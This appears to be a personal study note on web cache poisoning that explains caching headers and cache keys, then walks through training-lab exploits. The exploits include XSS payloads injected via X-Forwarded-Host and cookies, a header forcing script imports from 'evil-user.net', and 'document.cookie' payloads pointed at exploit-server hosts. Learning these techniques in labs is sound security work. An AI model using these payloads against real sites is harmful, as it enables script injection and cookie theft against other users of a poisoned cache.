owned this note
owned this note
Published
Linked with GitHub
# Web Cache Poisoning
###### `webSecurity` `cachePoisoning`
[TOC]
# Introduction & principle
Web catch is a technique
Attacker will find out the method to induce the back-end server response contain the malicious payload, which can attack other user who subsequently retrieve response.
2018->Practical Web Cache Poisoning
2020->"Web Cache Entanglement: Novel Pathways to Poisoning"
## Web Cache work
https://nitropack.io/blog/post/web-caching-beginners-guide
Web caching can be defined as the process of storing copies of websites in different locations, known as web caches.
### Cache HIT
- When a request retrieves data from the web cache, it's referred to as a "cache hit."
### Cache Miss
- When the cache is unable to fulfill the request, it's called a "cache miss."
## Cache Type
### Browser Caches (Private Cache )
Private cache store on user's device.
### Proxy Server Caches (Public Cache)
Proxy servers are typically maintained by ISPs or Content Delivery Network (CDN) providers.
CDN
CDN providers use managed panels to monitor and configure a proxy server across the world.
## Cache Header
When it comes to web caching, headers play a crucial role in controlling cache behavior.
### Expires Header
### Cache-Control Header
`no-store`:This directive instructs the web cache not to store any response
`no-cache` It tells the web cache that it must validate the cached content with the original server before serving it to the user.
`max-age`
max-age decides how long the resource can be considered fresh before it needs to be re-downloaded or revalidated with the origin server. For example, `max-age=31536000` is the maximum value, which equals 1 year.
`private`
the response only can be stored on the private cache (browser cache)
`public`
the response can be stored in any intermediate cache, including proxy caches.
`must-revalidate`
The `must-revalidate` directive enforces revalidation.
## Cache Freshness and Validation
In fact. the HTTP response usually set max-age =60
It allows the web cache can provide the response without connecting the back-end server.(unless there's a not-cache rule in place)
Validation
The web cache will ask the back-end server, if the temp store reponse is expire but it hash value is same the content and can i sent to the user expire reponse ?
### Validate header
#### Last-modified and if-modified-since
Last-modifed header allows put the validator in the initial response
and then, web cache will send the request include if-modifed-since ask the orign server the resource havn't been updated
#### Etag (Entity Tag)
An ETag is like a unique fingerprint for specific version of a resource.
When initial response is store in the web cache.
After the web cache save the ETAG, it can can send the request to the back-end systems with `if-none-header` header. This header allow the cache if its ETag matches the ETag of the server.
### Cache key
Cache key is pre-defined subset of the reqeust components.
The pre-defined subset typically contian the reqeust url and the HTTP header.
if the part of the reqeust that is not include in the cache key are said to be "unkeyed".
==Important==
the web cache will ignore the other part of the request, excluding reqeuest path and headers)
# Poison cache Impact
The Impact of web cache attack dependent on the two factor.
1. the nature of malicious payload that can be store in the cache.
Web acache is not a independent, it offen need to combine with other attack, such as inject attacks.
2. How many traffic on the web page
We can write script to send malicious content repeatedly. Avoid malicious cache is expire
---
# Construct Attack flow
## Identify
First step: identifying the "unkeyed" part of the request
We can inject malicious input unkeyed input fields and observing the resulting variations in responses.
Unkeyed part is our inject point!
## Param Miner (Automatically Discovery Inject point)
A parameter miner can be employed to automate the identification of unkeyed inputs,
>**Caution:** it is important to make sure that our requests all have a unique cache key so that they will only be served to us.
### Cache bruster
A cache buster is technique used in cache poisoning testing to ensure each request includes a unique parameter makes the request unique. This unique request avoid interference with regular user of online website.
Example:
```
GET /?meow=1 HTTP/2
```
## Obtaining Malicious Response form the back-end systems
When the user input didn't property sanitized, can trigger the harmful payload in the response, then this is a potential entry point for web cache poisoning
## Get the malicious response from web cache
After we have sucessfuly trigger harmful response by manipulating inputs, the next steps is to ensure the harmful response is stored in the web cache.
### Factors affecting the imapct of storing reponse in the web cache
- File Extension
- Content Type
- Route
- Status Code
- Respone Header
Understanding and controlling these factors is crucial when dealing with web cache poisoning vulnerabilities.
# Exploit
## web cache poisoning Arise
flaws in the web design itself.
Other times, it occurs because the website has been designed in a way that interacts with the web cache in a particular manner.
## Delivering the XSS payload
if the response have to fetch the value of dynamic header. there is a chance to manipulate the header value to cause the cache poisoning
### X-forwarded-Host
The X-forwarded-Host typically used to record initial domain name,
providing the basic domain information for web applications.
Example:
```
X-Forwarded-Host: meowhecker.com (request host domain)
```
Xss payload (Reflect~)
```
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
```
Obtaining A harmful response from the server
```
HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://a."><script>alert(1)</script>"/cms/social.png" />
```
It allow Attacker execute arbitrary Javascript in Victim's browser.
## Exploit unsafe handling of resource imports
```
GET / HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: evil-user.net
User-Agent: Mozilla/5.0 Firefox/57.0
HTTP/1.1 200 OK
<script src="https://evil-user.net/static/analytics.js"></script>
```
## LAB-Web cache poisioning with an unkeyed header
Cache miss(First Request)
Cache Hit
---
```
X-Forwarded-Host: zwrtxqvav5xuq82tt3
```
Create the Malisiout server
replace malisiout js file
Posint the web cache
cache miss -> cache hit (the response successfuly store in the cache)
## Exploit cookie Header (unkey)
Suppose: if cache key contain the reqeust line and HTTP header, but not the cookie header. it's possible to resulting in cache posion!
```
GET /blog/post.php?mobile=1 HTTP/1.1
Host: innocent-website.com
User-Agent: Mozilla/5.0 Firefox/57.0
Cookie: language=pl;
Connection: close
```
## LAB-Web cache poisoning with an unkeyed cookie
Analysis:
In this situation, there probably have a reflected XSS
Xss payload
```
fehost=123"-alert('meowhecker')-"456
```
## Exploit-Multiple Headers
```
GET /random HTTP/1.1
Host: innocent-site.com
X-Forwarded-Proto: http
HTTP/1.1 301 moved permanently
Location: https://innocent-site.com/random
```
X-Forwarded -> Elastic load blance
-> host: record client IP
-> proto: record using protocol between client and load balance or proxy
-> port: record client port
## LAB web cache poisoning with multiple headers
```
X-Forwarded-Scheme: nothttps
X-Forwarded-Host: /exploit-0adf000603bd28f68192fb5301c900c3.exploit-server.net
```
---
## Exploiting response that expose too much information
## Cache-control header analysis
To ensure the harmful response is stored the web cache, we can attempt to observer the response of Cache-Control Header.
Example:
```
Cache-control: public max-age=30
or
cache: miss
cache: Hit
```
we can advantage of this information to construct the attack ofcuse on single user or specific group user.
Example
```
User-Agent:
```
it allow us to posion spcific user agents or devices which could raise suspicions, the attacker can carefully time a single malicious request to poison the cache.
### Vary Header
Varay Header is used to crate the cache key
```
vary: 'header-name', 'header-name'
vary: 'User-Agent'
```
## LAB Target web cache poisoning using know header
```
X-Host:
```
---
---
Get the spcific user agnet
Not Work !! (是超九
```
document.write('<img src="https://exploit-0ab4006a04fc7d248103f11101fc00c4.exploit-server.net/test" onerror =alert("trigger ")>meowwwwwwwwwwwwwwwwwwwwwww);
alert(document.cookie);
```
Victim 沒辦法吃的posion response 是很正常
因為 User-agent 在cache key 中 (Vary: Usuer-Agent)
---
Html injection in comment block
paylaod
```
<img src=https://exploit-server.net></img>
```
```
Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
```
```
GET / HTTP/1.1
....
X-Host: exploit-0adf0073032ca21f89b36d5f01fa00fa.exploit-server.net
...
User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
```
---
## Exploit DOM-Based vulnerability (skip->CORS!!)
##
Google Drive
Gist
Clipboard
Sign in with Wallet
